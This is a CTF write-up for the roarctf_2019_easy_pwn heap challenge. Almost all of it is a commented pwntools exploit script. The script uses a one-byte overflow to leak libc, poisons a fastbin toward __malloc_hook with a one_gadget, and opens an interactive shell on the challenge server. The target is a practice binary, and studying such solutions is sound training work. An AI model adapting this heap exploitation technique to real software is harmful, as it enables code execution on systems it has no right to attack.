roarctf


    溢出一个字节，修改 size 域

    exp

    """Exploit script from a write-up of the roarctf_2019_easy_pwn challenge.

    The target is a menu-driven note program (menu choices 1-4: create,
    write, drop, show). The write-up summarises the bug as a one-byte
    overflow that rewrites a chunk's size field; this script drives the
    menu with pwntools, reads a libc pointer back through show_note(),
    derives addresses from it, and then writes into the region around
    __malloc_hook before handing the connection to the user.

    Every numeric constant below (the 0x3c4b78 libc offset, the 0x4526a
    one_gadget offset, the remote host/port, the note sizes) belongs to
    this specific challenge build and the bundled ./libc-2.23.so; none of
    them is portable to another binary or libc.
    """
    from pwn import *
    context.log_level = 'debug'


    def debug_pause():
        """Log the target's PID and pause so a debugger can be attached.

        Defined but never called in this script. It also assumes ``p`` is a
        local process; the ``p = remote(...)`` line below makes that false.
        """
        log.info(proc.pidof(p))
        pause()


    def create_note(size, ):
        """Menu choice 1: ask the program to allocate a note of ``size`` bytes."""
        p.sendlineafter('choice:', str(1))
        p.sendlineafter('size:', str(size))


    def write_note(index, size, content):
        """Menu choice 2: send ``size`` and then ``content`` for note ``index``.

        ``content`` is sent as-is; the calls below deliberately pass a
        ``size`` larger than the note was created with (e.g. 0x18 + 10 for
        note 0), which is how the one-byte overflow is reached.
        """
        p.sendlineafter('choice:', str(2))
        p.sendlineafter('index:', str(index))
        p.sendlineafter('size:', str(size))
        p.sendlineafter('content:', content)


    def drop_note(index):
        """Menu choice 3: free note ``index``."""
        p.sendlineafter('choice:', str(3))
        p.sendlineafter('index:', str(index))


    def show_note(index):
        """Menu choice 4: print note ``index``; the caller reads the output."""
        p.sendlineafter('choice:', str(4))
        p.sendlineafter('index:', str(index))


    proc_name = './roarctf_2019_easy_pwn'
    p = process(proc_name)
    # NOTE(review): the local process started on the previous line is
    # immediately shadowed by the remote connection and is never closed;
    # comment out whichever of the two lines is not in use.
    p = remote('node3.buuoj.cn', 28035)
    elf = ELF(proc_name)  # loaded but not referenced anywhere below
    libc = ELF('./libc-2.23.so')

    # Initial layout: seven notes; the comment gives each note's index.
    create_note(0x18) # 0
    create_note(0x18) # 1
    create_note(0x88) # 2
    create_note(0x18) # 3
    create_note(0x28) # 4
    create_note(0x28) # 5
    create_note(0x68) # 6

    # 0x18 bytes of filler followed by the single byte 0xb1, written through
    # note 0 with a requested size larger than the 0x18 it was created with.
    # Per the write-up, this one overflowing byte rewrites a size field.
    write_note(0, 0x18 + 10, b'a' * 0x18 + p8(0xb1))
    drop_note(1)
    create_note(0xa8) # 1
    write_note(1, 0x20, b'a' * 0x18 + p64(0x91))
    drop_note(2)
    # show_note(1) prints note 1; the first 0x20 bytes of content are
    # discarded and the next 6 bytes are taken as a libc pointer.
    show_note(1)
    p.recvuntil('content: ')
    p.recv(0x20)
    # 0x3c4b78 is a hard-coded offset into the bundled ./libc-2.23.so and
    # must be recomputed for any other libc build.
    libc_base = u64(p.recv(6).ljust(0x8, b'\x00')) - 0x3c4b78
    log.info(hex(libc_base))
    malloc_hook = libc_base + libc.sym['__malloc_hook']
    realloc = libc_base + libc.sym['__libc_realloc']
    one_gadget = libc_base + 0x4526a  # hard-coded gadget offset; same caveat

    # Second overflow through note 4 (0x28 bytes of filler + byte 0xa1).
    # Notes 5 and 6 are then freed, and a new note 2 writes a fake 0x71
    # size field followed by a pointer to malloc_hook - 0x23.
    write_note(4, 50, b'a'*0x28+p8(0xa1))
    drop_note(5)
    drop_note(6)
    create_note(0x98) # 2
    write_note(2,0x38, b'a'*0x28+p64(0x71)+p64(malloc_hook-0x23))
    create_note(0x68) # 5
    create_note(0x68) # 6 hook
    # Written through note 6: 0xb bytes of filler, then one_gadget, then
    # __libc_realloc + 16 (the original author's note: "modify stack env").
    write_note(6, 27, b'a' * (0x13 - 8) + p64(one_gadget) + p64(realloc + 16)) # modify stack env
    # One final allocation, after which control is handed to the user.
    create_note(0x18)
    p.interactive()
